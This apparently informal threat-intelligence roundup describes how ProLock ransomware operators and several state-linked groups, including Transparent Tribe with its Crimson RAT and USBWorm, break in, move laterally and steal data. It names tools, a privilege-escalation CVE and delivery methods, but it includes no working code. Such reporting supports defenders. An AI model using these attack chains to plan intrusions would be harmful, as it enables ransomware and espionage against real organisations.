Prolock Ransomware 🔓 Unlocked

ProLock ransomware were able to deploy a large number of attacks over the past six months, using the standard operating tactic.vaveraging close to one target every day.

Initially started in late 2019, under the name PwndLocker, due to a crypto bug that allowed unlocking the files for free, the operators rebooted the operation with fixing the flaw and renaming the malware to ProLock.

A fresh start in March under the ProLock label also meant increased activity and larger ransoms. Since then, the average figure swelled to $1.8 million.

Simple operation

The threat actor has no preference for its targets or the sector of their activity as long as they are companies with big networks, able to pay a higher ransom. The focus seems to be on businesses in Europe and North America.

The group’s tactics, techniques, and procedures are simple and effective, the partnership with QakBot (QBot) banking trojan allowing them to map the network, move laterally, ultimately deploy the ransomware.

Between the initial compromise and running the file-encryption routine, the actor spends about a month on the network, gathering information for better targeting and exfiltrating data (via Rclone).

Running ProLock on the target network is the last step of the attack, which typically starts with a spear-phishing email containing weaponized VBScripts and Office documents that deliver QakBot, oftentimes via replies in hijacked email threads.

Once on the target host, Qakbot establishes persistence and makes sure that active defenses don’t spot it by modifying Windows Registry to add its binaries on the list of Windows Defender exclusions.

“QakBot also collects a lot of information about the infected host, including the IP address, hostname, domain, and list of installed programs. The threat actor acquires a basic understanding of the network and can plan post-exploitation activities”

With tools like Bloodhound and ADFind, the threat actor profiles the environment to distribute the banking trojan to other hosts on the network. In some cases, this was done manually using PsExec, suggesting a strong connection between ProLock and QakBot operators.

Moving laterally also involved the use of remote desktop (RDP), and when this was not available on a machine, the actor ran the following batch script via PsExec to enable the remote connection:

ProLock’s toolkit includes Mimikatz post-exploitation tool for penetration testers, which is deployed through Cobalt strike software for red team engagements.

The ransomware actor sometimes relies on a vulnerability in Windows (CVE-2019-0859) that enables them to escalate privileges on compromised systems.

The file-encrypting malware lands on the host either via QakBot, downloaded with the Background Intelligent Transfer Service (BITS) from the attacker’s server or by executing a script using Windows Management Instrumentation (WMIC) on a remote host.

Despite using standard tools, ProLock attacks remain largely undetected on the network, giving them time to prepare the file encryption stage and steal data.

Sophisticated APT attacks into limelight

Many Advanced Persistent Threat (APT) groups receive guidance and support from established nation-states. Unlike most threat actors, APT attackers chase their goals for months or even years with a clear objective in mind.

Sponsered by countries

  • State-sponsored APT groups are organizations that conduct attacks on a country’s information assets related to national security or economic importance, via means of cyberespionage or cyber sabotage.
  • While China and Russia stand atop the list of nations linked to the most sophisticated state-sponsored hacking groups, the number of government-linked cyberespionage campaigns from other countries has started to burgeon in recent years.

APTs current attacks

  • The China-based APT group, CactusPete, is targeting military and financial organizations in Eastern Europe with a new attack campaign. The group is employing a new variant of the Bisonal backdoor to steal information, move laterally inside a network, and execute codes on target machines.
  • A Russian-speaking hacking group, RedCurl, which has conducted 26 corporate espionage attacks, since 2018, in attempts to steal confidential corporate information from victims in the finance, construction, law, retail, and other sectors.
  • The “Operation Skeleton Key” attacks performed by a Chinese APT group, Chimera, against numerous semiconductor vendors of Taiwan. The hackers are known to abuse Cobalt Strike, a penetration testing tool and a custom skeleton key obtained by twisting the codes of Dumpert and Mimikatz.
  • Fox Kitten (aka Parisite), a group of Iranian government-based hackers has been detected attacking the private and government sectors in the U.S. The threat actors operate by targeting high-end and high-priced network equipment using exploits for newly disclosed vulnerabilities.

The crucial role of global vigilance

From a global standpoint, visibility into these APT groups is getting better, which is good news. Due to coordinated data operations worldwide, countries and businesses are aware of the rising APT activities and are taking them seriously.

The information security community has started collaborating and sharing observed Tactics, Techniques, and Procedures (TTPs). This cooperation is needed to alleviate growing threats.

Transparent Tribe ! ⛓️ Espionage on Government

Recent espionage campaign targetting government authorities of India , Afganistan and other Asian countries . As named as Transparent tribe originally in operation form 2013 also called as ProjectM

Transparent Tribe is focused on surveillance and spying, and to accomplish these ends, the group is constantly evolving its toolkit depending on the intended target.

The attack chain starts off in a typical way, via spear-phishing emails. Fraudulent messages are sent together with malicious Microsoft Office documents containing an embedded macro that deploys the group’s main payload, the Crimson Remote Access Trojan (RAT).

If a victim falls for the scheme and enables macros, the custom .NET Trojan launches and performs a variety of functions, including connecting to a command-and-control (C2) server for data exfiltration and remote malware updates, stealing files, capturing screenshots, and compromising microphones and webcams for audio and video surveillance.

Trojan is also able to steal files from removable media, key log, and harvest credentials stored in browsers.

The Trojan comes in two versions that have been compiled across 2017, 2018, and at the end of 2019, suggesting the malware is still in active development.

Transparent Tribe also makes use of other .NET malware and a Python-based Trojan called Peppy, but a new USB attack tool is of particular interest.

USBWorm is made up of two main components, a file stealer for removable drives and a worm feature for jumping to new, vulnerable machines.

If a USB drive is connected to an infected PC, a copy of the Trojan is quietly installed on the removable drive. The malware will list all directories on a drive and then a copy of the Trojan is buried in the root drive directory. The directory attribute is then changed to “hidden” and a fake Windows directly icon is used to lure victims into clicking on and executing the payload when they attempt to access directories.

“This results in all the actual directories being hidden and replaced with a copy of the malware using the same directory name,” .

Over 200 samples of Transparent Tribe Crimson components were detected between June 2019 and June 2020.”We don’t expect any slowdown from this group in the near future.”